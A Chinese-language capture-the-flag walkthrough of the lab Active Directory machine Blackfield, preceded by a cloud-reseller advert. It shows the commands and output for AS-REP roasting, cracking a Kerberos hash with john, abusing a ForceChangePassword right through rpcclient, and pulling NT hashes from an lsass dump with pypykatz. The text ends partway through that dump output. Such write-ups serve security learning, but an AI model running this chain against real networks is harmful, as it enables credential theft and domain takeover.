HTB打靶(Active Directory 101 Blackfield)

阿里云国内75折 回扣 微信号:monov8
阿里云国际,腾讯云国际,低至75折。AWS 93折 免费开户实名账号 代冲值 优惠多多 微信号:monov8 飞机:@monov6

nmap扫描

nmap -A -T4 10.10.10.192
    Starting Nmap 7.92 ( https://nmap.org ) at 2022-12-30 08:58 EST
    Stats: 0:00:29 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
    SYN Stealth Scan Timing: About 88.95% done; ETC: 08:59 (0:00:03 remaining)
    Nmap scan report for 10.10.10.192 (10.10.10.192)
    Host is up (0.64s latency).
    Not shown: 993 filtered tcp ports (no-response)
    PORT     STATE SERVICE       VERSION
    53/tcp   open  domain        Simple DNS Plus
    88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2022-12-30 21:59:34Z)
    135/tcp  open  msrpc         Microsoft Windows RPC
    389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
    445/tcp  open  microsoft-ds?
    593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
    3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
    Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
    OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
    No OS matches for host
    Network Distance: 2 hops
    Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

    Host script results:
    |_clock-skew: 7h59m58s
    | smb2-time:
    |   date: 2022-12-30T22:00:28
    |_  start_date: N/A
    | smb2-security-mode:
    |   3.1.1:
    |_    Message signing enabled and required

    TRACEROUTE (using port 135/tcp)
    HOP RTT       ADDRESS
    1   628.05 ms 10.10.16.1 (10.10.16.1)
    2   628.30 ms 10.10.10.192 (10.10.10.192)

    OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 169.36 seconds
    发现这是一台域控机器并且开放了smb协议

尝试匿名访问smb

命令:smbclient -L //10.10.10.192
回显:
    smbclient -L //10.10.10.192
        Password for [WORKGROUP\root]:
        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        forensic        Disk      Forensic / Audit share.
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share
        profiles$       Disk
        SYSVOL          Disk      Logon server share
发现profiles$目录以及SYSVOL尝试进行获取groups.xml创建组策略脚本登录配置文件,发现SYSVOL访问失败但是可以访问profiles$
profiles$文件夹内容:
smbclient //10.10.10.192/profiles$
Password for [WORKGROUP\root]:
Try "help" to get a list of possible commands.
smb: \> dir
.                                   D        0  Wed Jun  3 12:47:12 2020
..                                  D        0  Wed Jun  3 12:47:12 2020
AAlleni                             D        0  Wed Jun  3 12:47:11 2020
ABarteski                           D        0  Wed Jun  3 12:47:11 2020
ABekesz                             D        0  Wed Jun  3 12:47:11 2020
ABenzies                            D        0  Wed Jun  3 12:47:11 2020
ABiemiller                          D        0  Wed Jun  3 12:47:11 2020
AChampken                           D        0  Wed Jun  3 12:47:11 2020
ACheretei                           D        0  Wed Jun  3 12:47:11 2020
ACsonaki                            D        0  Wed Jun  3 12:47:11 2020
AHigchens                           D        0  Wed Jun  3 12:47:11 2020
AJaquemai                           D        0  Wed Jun  3 12:47:11 2020
AKlado                              D        0  Wed Jun  3 12:47:11 2020
AKoffenburger                       D        0  Wed Jun  3 12:47:11 2020
AKollolli                           D        0  Wed Jun  3 12:47:11 2020
AKruppe                             D        0  Wed Jun  3 12:47:11 2020
AKubale                             D        0  Wed Jun  3 12:47:11 2020
ALamerz                             D        0  Wed Jun  3 12:47:11 2020
AMaceldon                           D        0  Wed Jun  3 12:47:11 2020
AMasalunga                          D        0  Wed Jun  3 12:47:11 2020
ANavay                              D        0  Wed Jun  3 12:47:11 2020
ANesterova                          D        0  Wed Jun  3 12:47:11 2020
ANeusse                             D        0  Wed Jun  3 12:47:11 2020
AOkleshen                           D        0  Wed Jun  3 12:47:11 2020
APustulka                           D        0  Wed Jun  3 12:47:11 2020
ARotella                            D        0  Wed Jun  3 12:47:11 2020
ASanwardeker                        D        0  Wed Jun  3 12:47:11 2020
AShadaia                            D        0  Wed Jun  3 12:47:11 2020
ASischo                             D        0  Wed Jun  3 12:47:11 2020
ASpruce                             D        0  Wed Jun  3 12:47:11 2020
ATakach                             D        0  Wed Jun  3 12:47:11 2020
ATaueg                              D        0  Wed Jun  3 12:47:11 2020
ATwardowski                         D        0  Wed Jun  3 12:47:11 2020
audit2020                           D        0  Wed Jun  3 12:47:11 2020
AWangenheim                         D        0  Wed Jun  3 12:47:11 2020
AWorsey                             D        0  Wed Jun  3 12:47:11 2020
AZigmunt                            D        0  Wed Jun  3 12:47:11 2020
BBakajza                            D        0  Wed Jun  3 12:47:11 2020
BBeloucif                           D        0  Wed Jun  3 12:47:11 2020
BCarmitcheal                        D        0  Wed Jun  3 12:47:11 2020
BConsultant                         D        0  Wed Jun  3 12:47:11 2020
BErdossy                            D        0  Wed Jun  3 12:47:11 2020
BGeminski                           D        0  Wed Jun  3 12:47:11 2020
BLostal                             D        0  Wed Jun  3 12:47:11 2020
BMannise                            D        0  Wed Jun  3 12:47:11 2020
BNovrotsky                          D        0  Wed Jun  3 12:47:11 2020
BRigiero                            D        0  Wed Jun  3 12:47:11 2020
BSamkoses                           D        0  Wed Jun  3 12:47:11 2020
BZandonella                         D        0  Wed Jun  3 12:47:11 2020
CAcherman                           D        0  Wed Jun  3 12:47:12 2020
CAkbari                             D        0  Wed Jun  3 12:47:12 2020
CAldhowaihi                         D        0  Wed Jun  3 12:47:12 2020
CArgyropolous                       D        0  Wed Jun  3 12:47:12 2020
CDufrasne                           D        0  Wed Jun  3 12:47:12 2020
CGronk                              D        0  Wed Jun  3 12:47:11 2020
Chiucarello                         D        0  Wed Jun  3 12:47:11 2020
Chiuccariello                       D        0  Wed Jun  3 12:47:12 2020
CHoytal                             D        0  Wed Jun  3 12:47:12 2020
CKijauskas                          D        0  Wed Jun  3 12:47:12 2020
CKolbo                              D        0  Wed Jun  3 12:47:12 2020
CMakutenas                          D        0  Wed Jun  3 12:47:12 2020
CMorcillo                           D        0  Wed Jun  3 12:47:11 2020
CSchandall                          D        0  Wed Jun  3 12:47:12 2020
CSelters                            D        0  Wed Jun  3 12:47:12 2020
CTolmie                             D        0  Wed Jun  3 12:47:12 2020
DCecere                             D        0  Wed Jun  3 12:47:12 2020
DChintalapalli                      D        0  Wed Jun  3 12:47:12 2020
DCwilich                            D        0  Wed Jun  3 12:47:12 2020
DGarbatiuc                          D        0  Wed Jun  3 12:47:12 2020
DKemesies                           D        0  Wed Jun  3 12:47:12 2020
DMatuka                             D        0  Wed Jun  3 12:47:12 2020
DMedeme                             D        0  Wed Jun  3 12:47:12 2020
DMeherek                            D        0  Wed Jun  3 12:47:12 2020
DMetych                             D        0  Wed Jun  3 12:47:12 2020
DPaskalev                           D        0  Wed Jun  3 12:47:12 2020
DPriporov                           D        0  Wed Jun  3 12:47:12 2020
DRusanovskaya                       D        0  Wed Jun  3 12:47:12 2020
DVellela                            D        0  Wed Jun  3 12:47:12 2020
DVogleson                           D        0  Wed Jun  3 12:47:12 2020
DZwinak                             D        0  Wed Jun  3 12:47:12 2020
EBoley                              D        0  Wed Jun  3 12:47:12 2020
EEulau                              D        0  Wed Jun  3 12:47:12 2020
EFeatherling                        D        0  Wed Jun  3 12:47:12 2020
EFrixione                           D        0  Wed Jun  3 12:47:12 2020
EJenorik                            D        0  Wed Jun  3 12:47:12 2020
EKmilanovic                         D        0  Wed Jun  3 12:47:12 2020
ElKatkowsky                         D        0  Wed Jun  3 12:47:12 2020
EmaCaratenuto                       D        0  Wed Jun  3 12:47:12 2020
EPalislamovic                       D        0  Wed Jun  3 12:47:12 2020
EPryar                              D        0  Wed Jun  3 12:47:12 2020
ESachhitello                        D        0  Wed Jun  3 12:47:12 2020
ESariotti                           D        0  Wed Jun  3 12:47:12 2020
ETurgano                            D        0  Wed Jun  3 12:47:12 2020
EWojtila                            D        0  Wed Jun  3 12:47:12 2020
FAlirezai                           D        0  Wed Jun  3 12:47:12 2020
FBaldwind                           D        0  Wed Jun  3 12:47:12 2020
FBroj                               D        0  Wed Jun  3 12:47:12 2020
FDeblaquire                         D        0  Wed Jun  3 12:47:12 2020
FDegeorgio                          D        0  Wed Jun  3 12:47:12 2020
FianLaginja                         D        0  Wed Jun  3 12:47:12 2020
FLasokowski                         D        0  Wed Jun  3 12:47:12 2020
FPflum                              D        0  Wed Jun  3 12:47:12 2020
FReffey                             D        0  Wed Jun  3 12:47:12 2020
GaBelithe                           D        0  Wed Jun  3 12:47:12 2020
Gareld                              D        0  Wed Jun  3 12:47:12 2020
GBatowski                           D        0  Wed Jun  3 12:47:12 2020
GForshalger                         D        0  Wed Jun  3 12:47:12 2020
GGomane                             D        0  Wed Jun  3 12:47:12 2020
GHisek                              D        0  Wed Jun  3 12:47:12 2020
GMaroufkhani                        D        0  Wed Jun  3 12:47:12 2020
GMerewether                         D        0  Wed Jun  3 12:47:12 2020
GQuinniey                           D        0  Wed Jun  3 12:47:12 2020
GRoswurm                            D        0  Wed Jun  3 12:47:12 2020
GWiegard                            D        0  Wed Jun  3 12:47:12 2020
HBlaziewske                         D        0  Wed Jun  3 12:47:12 2020
HColantino                          D        0  Wed Jun  3 12:47:12 2020
HConforto                           D        0  Wed Jun  3 12:47:12 2020
HCunnally                           D        0  Wed Jun  3 12:47:12 2020
HGougen                             D        0  Wed Jun  3 12:47:12 2020
HKostova                            D        0  Wed Jun  3 12:47:12 2020
IChristijr                          D        0  Wed Jun  3 12:47:12 2020
IKoledo                             D        0  Wed Jun  3 12:47:12 2020
IKotecky                            D        0  Wed Jun  3 12:47:12 2020
ISantosi                            D        0  Wed Jun  3 12:47:12 2020
JAngvall                            D        0  Wed Jun  3 12:47:12 2020
JBehmoiras                          D        0  Wed Jun  3 12:47:12 2020
JDanten                             D        0  Wed Jun  3 12:47:12 2020
JDjouka                             D        0  Wed Jun  3 12:47:12 2020
JKondziola                          D        0  Wed Jun  3 12:47:12 2020
JLeytushsenior                      D        0  Wed Jun  3 12:47:12 2020
JLuthner                            D        0  Wed Jun  3 12:47:12 2020
JMoorehendrickson                   D        0  Wed Jun  3 12:47:12 2020
JPistachio                          D        0  Wed Jun  3 12:47:12 2020
JScima                              D        0  Wed Jun  3 12:47:12 2020
JSebaali                            D        0  Wed Jun  3 12:47:12 2020
JShoenherr                          D        0  Wed Jun  3 12:47:12 2020
JShuselvt                           D        0  Wed Jun  3 12:47:12 2020
KAmavisca                           D        0  Wed Jun  3 12:47:12 2020
KAtolikian                          D        0  Wed Jun  3 12:47:12 2020
KBrokinn                            D        0  Wed Jun  3 12:47:12 2020
KCockeril                           D        0  Wed Jun  3 12:47:12 2020
KColtart                            D        0  Wed Jun  3 12:47:12 2020
KCyster                             D        0  Wed Jun  3 12:47:12 2020
KDorney                             D        0  Wed Jun  3 12:47:12 2020
KKoesno                             D        0  Wed Jun  3 12:47:12 2020
KLangfur                            D        0  Wed Jun  3 12:47:12 2020
KMahalik                            D        0  Wed Jun  3 12:47:12 2020
KMasloch                            D        0  Wed Jun  3 12:47:12 2020
KMibach                             D        0  Wed Jun  3 12:47:12 2020
KParvankova                         D        0  Wed Jun  3 12:47:12 2020
KPregnolato                         D        0  Wed Jun  3 12:47:12 2020
KRasmor                             D        0  Wed Jun  3 12:47:12 2020
KShievitz                           D        0  Wed Jun  3 12:47:12 2020
KSojdelius                          D        0  Wed Jun  3 12:47:12 2020
KTambourgi                          D        0  Wed Jun  3 12:47:12 2020
KVlahopoulos                        D        0  Wed Jun  3 12:47:12 2020
KZyballa                            D        0  Wed Jun  3 12:47:12 2020
LBajewsky                           D        0  Wed Jun  3 12:47:12 2020
LBaligand                           D        0  Wed Jun  3 12:47:12 2020
LBarhamand                          D        0  Wed Jun  3 12:47:12 2020
LBirer                              D        0  Wed Jun  3 12:47:12 2020
LBobelis                            D        0  Wed Jun  3 12:47:12 2020
LChippel                            D        0  Wed Jun  3 12:47:12 2020
LChoffin                            D        0  Wed Jun  3 12:47:12 2020
LCominelli                          D        0  Wed Jun  3 12:47:12 2020
LDruge                              D        0  Wed Jun  3 12:47:12 2020
LEzepek                             D        0  Wed Jun  3 12:47:12 2020
LHyungkim                           D        0  Wed Jun  3 12:47:12 2020
LKarabag                            D        0  Wed Jun  3 12:47:12 2020
LKirousis                           D        0  Wed Jun  3 12:47:12 2020
LKnade                              D        0  Wed Jun  3 12:47:12 2020
LKrioua                             D        0  Wed Jun  3 12:47:12 2020
LLefebvre                           D        0  Wed Jun  3 12:47:12 2020
LLoeradeavilez                      D        0  Wed Jun  3 12:47:12 2020
LMichoud                            D        0  Wed Jun  3 12:47:12 2020
LTindall                            D        0  Wed Jun  3 12:47:12 2020
LYturbe                             D        0  Wed Jun  3 12:47:12 2020
MArcynski                           D        0  Wed Jun  3 12:47:12 2020
MAthilakshmi                        D        0  Wed Jun  3 12:47:12 2020
MAttravanam                         D        0  Wed Jun  3 12:47:12 2020
MBrambini                           D        0  Wed Jun  3 12:47:12 2020
MHatziantoniou                      D        0  Wed Jun  3 12:47:12 2020
MHoerauf                            D        0  Wed Jun  3 12:47:12 2020
MKermarrec                          D        0  Wed Jun  3 12:47:12 2020
MKillberg                           D        0  Wed Jun  3 12:47:12 2020
MLapesh                             D        0  Wed Jun  3 12:47:12 2020
MMakhsous                           D        0  Wed Jun  3 12:47:12 2020
MMerezio                            D        0  Wed Jun  3 12:47:12 2020
MNaciri                             D        0  Wed Jun  3 12:47:12 2020
MShanmugarajah                      D        0  Wed Jun  3 12:47:12 2020
MSichkar                            D        0  Wed Jun  3 12:47:12 2020
MTemko                              D        0  Wed Jun  3 12:47:12 2020
MTipirneni                          D        0  Wed Jun  3 12:47:12 2020
MTonuri                             D        0  Wed Jun  3 12:47:12 2020
MVanarsdel                          D        0  Wed Jun  3 12:47:12 2020
NBellibas                           D        0  Wed Jun  3 12:47:12 2020
NDikoka                             D        0  Wed Jun  3 12:47:12 2020
NGenevro                            D        0  Wed Jun  3 12:47:12 2020
NGoddanti                           D        0  Wed Jun  3 12:47:12 2020
NMrdirk                             D        0  Wed Jun  3 12:47:12 2020
NPulido                             D        0  Wed Jun  3 12:47:12 2020
NRonges                             D        0  Wed Jun  3 12:47:12 2020
NSchepkie                           D        0  Wed Jun  3 12:47:12 2020
NVanpraet                           D        0  Wed Jun  3 12:47:12 2020
OBelghazi                           D        0  Wed Jun  3 12:47:12 2020
OBushey                             D        0  Wed Jun  3 12:47:12 2020
OHardybala                          D        0  Wed Jun  3 12:47:12 2020
OLunas                              D        0  Wed Jun  3 12:47:12 2020
ORbabka                             D        0  Wed Jun  3 12:47:12 2020
PBourrat                            D        0  Wed Jun  3 12:47:12 2020
PBozzelle                           D        0  Wed Jun  3 12:47:12 2020
PBranti                             D        0  Wed Jun  3 12:47:12 2020
PCapperella                         D        0  Wed Jun  3 12:47:12 2020
PCurtz                              D        0  Wed Jun  3 12:47:12 2020
PDoreste                            D        0  Wed Jun  3 12:47:12 2020
PGegnas                             D        0  Wed Jun  3 12:47:12 2020
PMasulla                            D        0  Wed Jun  3 12:47:12 2020
PMendlinger                         D        0  Wed Jun  3 12:47:12 2020
PParakat                            D        0  Wed Jun  3 12:47:12 2020
PProvencer                          D        0  Wed Jun  3 12:47:12 2020
PTesik                              D        0  Wed Jun  3 12:47:12 2020
PVinkovich                          D        0  Wed Jun  3 12:47:12 2020
PVirding                            D        0  Wed Jun  3 12:47:12 2020
PWeinkaus                           D        0  Wed Jun  3 12:47:12 2020
RBaliukonis                         D        0  Wed Jun  3 12:47:12 2020
RBochare                            D        0  Wed Jun  3 12:47:12 2020
RKrnjaic                            D        0  Wed Jun  3 12:47:12 2020
RNemnich                            D        0  Wed Jun  3 12:47:12 2020
RPoretsky                           D        0  Wed Jun  3 12:47:12 2020
RStuehringer                        D        0  Wed Jun  3 12:47:12 2020
RSzewczuga                          D        0  Wed Jun  3 12:47:12 2020
RVallandas                          D        0  Wed Jun  3 12:47:12 2020
RWeatherl                           D        0  Wed Jun  3 12:47:12 2020
RWissor                             D        0  Wed Jun  3 12:47:12 2020
SAbdulagatov                        D        0  Wed Jun  3 12:47:12 2020
SAjowi                              D        0  Wed Jun  3 12:47:12 2020
SAlguwaihes                         D        0  Wed Jun  3 12:47:12 2020
SBonaparte                          D        0  Wed Jun  3 12:47:12 2020
SBouzane                            D        0  Wed Jun  3 12:47:12 2020
SChatin                             D        0  Wed Jun  3 12:47:12 2020
SDellabitta                         D        0  Wed Jun  3 12:47:12 2020
SDhodapkar                          D        0  Wed Jun  3 12:47:12 2020
SEulert                             D        0  Wed Jun  3 12:47:12 2020
SFadrigalan                         D        0  Wed Jun  3 12:47:12 2020
SGolds                              D        0  Wed Jun  3 12:47:12 2020
SGrifasi                            D        0  Wed Jun  3 12:47:12 2020
SGtlinas                            D        0  Wed Jun  3 12:47:12 2020
SHauht                              D        0  Wed Jun  3 12:47:12 2020
SHederian                           D        0  Wed Jun  3 12:47:12 2020
SHelregel                           D        0  Wed Jun  3 12:47:12 2020
SKrulig                             D        0  Wed Jun  3 12:47:12 2020
SLewrie                             D        0  Wed Jun  3 12:47:12 2020
SMaskil                             D        0  Wed Jun  3 12:47:12 2020
Smocker                             D        0  Wed Jun  3 12:47:12 2020
SMoyta                              D        0  Wed Jun  3 12:47:12 2020
SRaustiala                          D        0  Wed Jun  3 12:47:12 2020
SReppond                            D        0  Wed Jun  3 12:47:12 2020
SSicliano                           D        0  Wed Jun  3 12:47:12 2020
SSilex                              D        0  Wed Jun  3 12:47:12 2020
SSolsbak                            D        0  Wed Jun  3 12:47:12 2020
STousignaut                         D        0  Wed Jun  3 12:47:12 2020
support                             D        0  Wed Jun  3 12:47:12 2020
svc_backup                          D        0  Wed Jun  3 12:47:12 2020
SWhyte                              D        0  Wed Jun  3 12:47:12 2020
SWynigear                           D        0  Wed Jun  3 12:47:12 2020
TAwaysheh                           D        0  Wed Jun  3 12:47:12 2020
TBadenbach                          D        0  Wed Jun  3 12:47:12 2020
TCaffo                              D        0  Wed Jun  3 12:47:12 2020
TCassalom                           D        0  Wed Jun  3 12:47:12 2020
TEiselt                             D        0  Wed Jun  3 12:47:12 2020
TFerencdo                           D        0  Wed Jun  3 12:47:12 2020
TGaleazza                           D        0  Wed Jun  3 12:47:12 2020
TKauten                             D        0  Wed Jun  3 12:47:12 2020
TKnupke                             D        0  Wed Jun  3 12:47:12 2020
TLintlop                            D        0  Wed Jun  3 12:47:12 2020
TMusselli                           D        0  Wed Jun  3 12:47:12 2020
TOust                               D        0  Wed Jun  3 12:47:12 2020
TSlupka                             D        0  Wed Jun  3 12:47:12 2020
TStausland                          D        0  Wed Jun  3 12:47:12 2020
TZumpella                           D        0  Wed Jun  3 12:47:12 2020
UCrofskey                           D        0  Wed Jun  3 12:47:12 2020
UMarylebone                         D        0  Wed Jun  3 12:47:12 2020
UPyrke                              D        0  Wed Jun  3 12:47:12 2020
VBublavy                            D        0  Wed Jun  3 12:47:12 2020
VButziger                           D        0  Wed Jun  3 12:47:12 2020
VFuscca                             D        0  Wed Jun  3 12:47:12 2020
VLitschauer                         D        0  Wed Jun  3 12:47:12 2020
VMamchuk                            D        0  Wed Jun  3 12:47:12 2020
VMarija                             D        0  Wed Jun  3 12:47:12 2020
VOlaosun                            D        0  Wed Jun  3 12:47:12 2020
VPapalouca                          D        0  Wed Jun  3 12:47:12 2020
WSaldat                             D        0  Wed Jun  3 12:47:12 2020
WVerzhbytska                        D        0  Wed Jun  3 12:47:12 2020
WZelazny                            D        0  Wed Jun  3 12:47:12 2020
XBemelen                            D        0  Wed Jun  3 12:47:12 2020
XDadant                             D        0  Wed Jun  3 12:47:12 2020
XDebes                              D        0  Wed Jun  3 12:47:12 2020
XKonegni                            D        0  Wed Jun  3 12:47:12 2020
XRykiel                             D        0  Wed Jun  3 12:47:12 2020
YBleasdale                          D        0  Wed Jun  3 12:47:12 2020
YHuftalin                           D        0  Wed Jun  3 12:47:12 2020
YKivlen                             D        0  Wed Jun  3 12:47:12 2020
YKozlicki                           D        0  Wed Jun  3 12:47:12 2020
YNyirenda                           D        0  Wed Jun  3 12:47:12 2020
YPredestin                          D        0  Wed Jun  3 12:47:12 2020
YSeturino                           D        0  Wed Jun  3 12:47:12 2020
YSkoropada                          D        0  Wed Jun  3 12:47:12 2020
YVonebers                           D        0  Wed Jun  3 12:47:12 2020
YZarpentine                         D        0  Wed Jun  3 12:47:12 2020
ZAlatti                             D        0  Wed Jun  3 12:47:12 2020
ZKrenselewski                       D        0  Wed Jun  3 12:47:12 2020
ZMalaab                             D        0  Wed Jun  3 12:47:12 2020
ZMiick                              D        0  Wed Jun  3 12:47:12 2020
ZScozzari                           D        0  Wed Jun  3 12:47:12 2020
ZTimofeeff                          D        0  Wed Jun  3 12:47:12 2020
ZWausik                             D        0  Wed Jun  3 12:47:12 2020

从文件夹目录名称来看可以推测出可能是账号,可以尝试下

使用GetNpUsers.py来爆破用户进行AS-REP Roasting攻击(需要关闭域的预认证)

python3 GetNPUsers.py blackfield.local/ -no-pass -usersfile /home/kali/temp/user.tx
t -dc-ip 10.10.10.192 | grep -v 'KDC_ERR_C_PRINCIPAL_UNKNOWN'
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation

[-] User audit2020 doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$23$support@BLACKFIELD.LOCAL:129cc24ace47c997afc942a98a13a0dc$69ab1477edd37c82c509fb134b9197eb0175d70106c79e615c7cae713036ccc08b8e3a06c402aa29a7695a30254ffa45abee5468c5b38b525dd27a701401a6812d1839ea3b30569e518d3004089a1358c952f5d699abf292f6fc6327742639a43a0fca0e03476757506f7207f9b1e3e58b08f15b3af9a158a94c9b5f02eb5f509031b74e14eb0ec1efcfc11cf02d902c54af4bb6c3eba37ba58c7bf4fa7641f5e4d3fdb08e6479f0cc58790fa86d8362adc8153fde50786ed701a860208d7d3582bd2ef3a2777c3d9572d98600bbd7931f818c3f9aca558f6df226af54af8df98466a7c215d55fde52fdc452371013076f0c04be
[-] User svc_backup doesn't have UF_DONT_REQUIRE_PREAUTH set
user.txt就是上面的账号发现support账号可以成功,下面使用john爆破密码

john爆破密码

命令:   
    john supportHash.txt --format=krb5asrep -w=/usr/share/wordlists/rockyou.txt
回显:
    Using default input encoding: UTF-8
    Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 256/256 AVX2 8x])
    Will run 4 OpenMP threads
    Press 'q' or Ctrl-C to abort, almost any other key for status
    #00^BlackKnight  ($krb5asrep$23$support@BLACKFIELD.LOCAL)
    1g 0:00:00:10 DONE (2023-01-01 03:18) 0.09416g/s 1349Kp/s 1349Kc/s 1349KC/s #1SEXYREDD..#$%3455y6
    Use the "--show" option to display all of the cracked passwords reliably
    Session completed.
查看密码:
     john --show supportHash.txt

    $krb5asrep$23$support@BLACKFIELD.LOCAL:#00^BlackKnight

    1 password hash cracked, 0 left
得到账号密码:
        support
        #00^BlackKnight

使用bloodhound.py工具收集域信息

github下载:
    https://github.com/fox-it/BloodHound.py
命令:
    python bloodhound.py -u support -p '#00^BlackKnight' -d blackfield.local -ns 10.10.10.192 -c DcOnly    
参数说明:
    -u support 指定了要使用的用户名。在这个例子中它是 "support"。
    -p '#00^BlackKnight' 指定了要使用的密码。在这个例子中它是 "#00^BlackKnight"。
    -d blackfield.local 指定了要连接的域的名称。在这个例子中它是 "blackfield.local"。
    -ns 10.10.10.192 指定了要连接的域控制器的 IP 地址。在这个例子中它是 "10.10.10.192"。
    -c DcOnly 指定了要连接的域控制器的类型。在这个例子中它是 "DcOnly"表示只连接域控制器。   
注意:
    请使用python而非python3否则会报错  

使用bloodhound分析域

SUPPORT@BLACKFIELD.LOCAL账号右键设置为Mark User as Owned和Set as Starting Node
Raw Query搜索条件:
    MATCH p=(u {owned: true})-[r1]->(n) WHERE r1.isacl=true RETURN p
查询设置了Owned的ACL权限发现对AUDIT2020@BLACKFIELD.LOCAL具有ForceChangePassword权限
 ForceChangePassword:
    用户SUPPORT@BLACKFIELD.LOCAL可以在不知道用户AUDIT2020@BLACKFIELD.LOCAL当前密码的情况下更改用户AUDIT2020@BLACKFIELD.LOCAL的密码。

使用rpcclient修改AUDIT2020密码

rpcclient -U blackfield/support 10.10.10.192
rpcclient $> setuserinfo audit2020 23 Hack@123
因为support对audit2020具有修改密码的ACL权限将密码修改为Hack@123

使用CrackMapExec登录SMB

安装:
    apt install -y crackmapexec
命令:
    crackmapexec smb 10.10.10.192 -u audit2020 -p 'Hack@123' --shares
回显:
    [*] First time use detected
    [*] Creating home directory structure
    [*] Creating default workspace
    [*] Initializing RDP protocol database
    [*] Initializing WINRM protocol database
    [*] Initializing SMB protocol database
    [*] Initializing FTP protocol database
    [*] Initializing LDAP protocol database
    [*] Initializing MSSQL protocol database
    [*] Initializing SSH protocol database
    [*] Copying default configuration file
    [*] Generating SSL certificate
    SMB         10.10.10.192    445    DC01             [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)
    SMB         10.10.10.192    445    DC01             [+] BLACKFIELD.local\audit2020:Hack@123
    SMB         10.10.10.192    445    DC01             [+] Enumerated shares
    SMB         10.10.10.192    445    DC01             Share           Permissions     Remark
    SMB         10.10.10.192    445    DC01             -----           -----------     ------
    SMB         10.10.10.192    445    DC01             ADMIN$                          Remote Admin
    SMB         10.10.10.192    445    DC01             C$                              Default share
    SMB         10.10.10.192    445    DC01             forensic        READ            Forensic / Audit share.
    SMB         10.10.10.192    445    DC01             IPC$            READ            Remote IPC
    SMB         10.10.10.192    445    DC01             NETLOGON        READ            Logon server share
    SMB         10.10.10.192    445    DC01             profiles$       READ

    SMB         10.10.10.192    445    DC01             SYSVOL          READ            Logon server share
    
    发现该用户具有读的权限,使用smbclient查看

使用smbclient查看forensic目录

impacket-impacket_0_9_22/examples使用impacket工具包
命令:python3 smbclient.py audit2020:'Hack@123'@10.10.10.192
回显:
    # use forensic
    # ls
    drw-rw-rw-          0  Sun Feb 23 10:10:16 2020 .
    drw-rw-rw-          0  Sun Feb 23 10:10:16 2020 ..
    drw-rw-rw-          0  Sun Feb 23 13:14:37 2020 commands_output
    drw-rw-rw-          0  Thu May 28 16:29:24 2020 memory_analysis
    drw-rw-rw-          0  Fri Feb 28 17:30:34 2020 tools
    # cd memory_analysis
    # ls
    drw-rw-rw-          0  Thu May 28 16:29:24 2020 .
    drw-rw-rw-          0  Thu May 28 16:29:24 2020 ..
    -rw-rw-rw-   37876530  Thu May 28 16:29:24 2020 conhost.zip
    -rw-rw-rw-   24962333  Thu May 28 16:29:24 2020 ctfmon.zip
    -rw-rw-rw-   23993305  Thu May 28 16:29:24 2020 dfsrs.zip
    -rw-rw-rw-   18366396  Thu May 28 16:29:24 2020 dllhost.zip
    -rw-rw-rw-    8810157  Thu May 28 16:29:24 2020 ismserv.zip
    -rw-rw-rw-   41936098  Thu May 28 16:29:24 2020 lsass.zip
    -rw-rw-rw-   64288607  Thu May 28 16:29:24 2020 mmc.zip
    -rw-rw-rw-   13332174  Thu May 28 16:29:24 2020 RuntimeBroker.zip
    -rw-rw-rw-  131983313  Thu May 28 16:29:24 2020 ServerManager.zip
    -rw-rw-rw-   33141744  Thu May 28 16:29:24 2020 sihost.zip
    -rw-rw-rw-   33756344  Thu May 28 16:29:24 2020 smartscreen.zip
    -rw-rw-rw-   14408833  Thu May 28 16:29:24 2020 svchost.zip
    -rw-rw-rw-   34631412  Thu May 28 16:29:24 2020 taskhostw.zip
    -rw-rw-rw-   14255089  Thu May 28 16:29:24 2020 winlogon.zip
    -rw-rw-rw-    4067425  Thu May 28 16:29:24 2020 wlms.zip
    -rw-rw-rw-   18303252  Thu May 28 16:29:24 2020 WmiPrvSE.zip
发现在forensic目录下有memory_analysis文件夹进入发现lsass.zip应该是lsass的dump转储具有重要价值下载查看
命令:
    smbclient.py shell 
    get lsass.zip

使用pypykatz工具提取lsass中NTLM hash

下载:
    https://github.com/skelsec/pypykatz
命令:
    pypykatz lsa minidump lsass.DMP
回显:
    INFO:root:Parsing file lsass.DMP
    FILE: ======== lsass.DMP =======
    == LogonSession ==
    authentication_id 406458 (633ba)
    session_id 2
    username svc_backup
    domainname BLACKFIELD
    logon_server DC01
    logon_time 2020-02-23T18:00:03.423728+00:00
    sid S-1-5-21-4194615774-2175524697-3563712290-1413
    luid 406458
            == MSV ==
                    Username: svc_backup
                    Domain: BLACKFIELD
                    LM: NA
                    NT: 9658d1d1dcd9250115e2205d9f48400d
                    SHA1: 463c13a9a31fc3252c68ba0a44f0221626a33e5c
                    DPAPI: a03cd8e9d30171f3cfe8caad92fef621
            == WDIGEST [633ba]==
                    username svc_backup
                    domainname BLACKFIELD
                    password None
            == Kerberos ==
                    Username: svc_backup
                    Domain: BLACKFIELD.LOCAL
            == WDIGEST [633ba]==
                    username svc_backup
                    domainname BLACKFIELD
                    password None

    == LogonSession ==
    authentication_id 365835 (5950b)
    session_id 2
    username UMFD-2
    domainname Font Driver Host
    logon_server 
    logon_time 2020-02-23T17:59:38.218491+00:00
    sid S-1-5-96-0-2
    luid 365835
            == MSV ==
                    Username: DC01$
                    Domain: BLACKFIELD
                    LM: NA
                    NT: b624dc83a27cc29da11d9bf25efea796
                    SHA1: 4f2a203784d655bb3eda54ebe0cfdabe93d4a37d
                    DPAPI: NA
            == WDIGEST [5950b]==
                    username DC01$
